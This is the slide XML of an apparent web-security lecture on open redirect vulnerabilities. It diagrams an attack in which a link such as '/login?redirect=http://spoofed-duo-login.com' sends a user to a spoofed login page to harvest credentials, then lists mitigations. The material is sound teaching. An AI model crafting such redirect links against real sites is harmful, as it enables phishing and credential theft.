      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1631" name="Google Shape;1631;p234"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="770917" y="1198731"/>
            <a:ext cx="730331" cy="728400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1632" name="Google Shape;1632;p234"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1599163" y="1356575"/>
            <a:ext cx="9096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Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1633" name="Google Shape;1633;p234"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7671517" y="1198729"/>
            <a:ext cx="730324" cy="729105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1634" name="Google Shape;1634;p234"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7093725" y="1406798"/>
            <a:ext cx="7302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Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Duo</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>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35"/>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strike="sngStrike"/>
              <a:t>Improving UX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t> with Redirects </a:t>
            </a:r>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1640" name="Google Shape;1640;p235"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1113850" y="1870666"/>
            <a:ext cx="68430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rPr>
              <a:t>1. Attacker sends victim link with malicious redirect parameter</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/login?redirect=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://spoofed-duo-login.com</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1641" name="Google Shape;1641;p235"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1102438" y="2003841"/>
            <a:ext cx="5400" cy="2599500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1642" name="Google Shape;1642;p235"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1112618" y="2376528"/>
            <a:ext cx="6843000" cy="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rPr>
              <a:t>2. User logs in</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>POST /login</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     username=user&amp;password=password&amp;redirect=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://spoofed-duo-login.com</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1643" name="Google Shape;1643;p235"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8031238" y="2003841"/>
            <a:ext cx="5400" cy="2599500"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1644" name="Google Shape;1644;p235"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165150" y="3037261"/>
            <a:ext cx="6843000" cy="11400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1645" name="Google Shape;1645;p235"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1136239" y="3071141"/>
            <a:ext cx="6843000" cy="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rPr>
              <a:t>3. Redirect user to the spoofed destination</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>302 Found</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>     Location: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" i="1">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://spoofed-duo-login.com</a:t>
            </a:r>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1200" i="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1646" name="Google Shape;1646;p235"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1145350" y="3765168"/>
            <a:ext cx="6848400" cy="15300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1647" name="Google Shape;1647;p235"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165150" y="2351461"/>
            <a:ext cx="6843000" cy="11400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1648" name="Google Shape;1648;p235"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="770917" y="1198731"/>
            <a:ext cx="730331" cy="728400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1649" name="Google Shape;1649;p235"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1599163" y="1356575"/>
            <a:ext cx="9096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Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1650" name="Google Shape;1650;p235"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7671517" y="1198729"/>
            <a:ext cx="730324" cy="729105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1651" name="Google Shape;1651;p235"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7093725" y="1406798"/>
            <a:ext cx="7302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Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>Duo</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>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236"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="3866700" cy="9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of Open Redirect</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1657" name="Google Shape;1657;p236"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4698150" y="1058650"/>
            <a:ext cx="4347173" cy="3093924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1658" name="Google Shape;1658;p236"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1457575"/>
            <a:ext cx="4063200" cy="2787000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="137160" lvl="0" indent="-213359" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker can craft a link that appears to be for the target domain.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="640080" lvl="1" indent="-213360" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://duo.com/login?redirect=spoofed.com</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="640080" lvl="1" indent="-213360" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>This passes most phishing link tests! </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1097280" lvl="2" indent="-213360" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>“https://”</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1097280" lvl="2" indent="-213360" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>“duo.com”</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="137160" lvl="0" indent="-213359" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="363F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The eventual redirection target may fake an “invalid login” error and ask the user to re-submit credentials to the attacker’s domain</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFF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237"/>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Redirect Mitigation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1664" name="Google Shape;1664;p237"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429300" y="1058650"/>
            <a:ext cx="8285400" cy="7284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6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Avoid user-controlled redirect locations if possible!</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ensure that redirect locations are relative paths, URLs are complex:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Might need to check: </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>if scheme (e.g. “http://”) is included</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
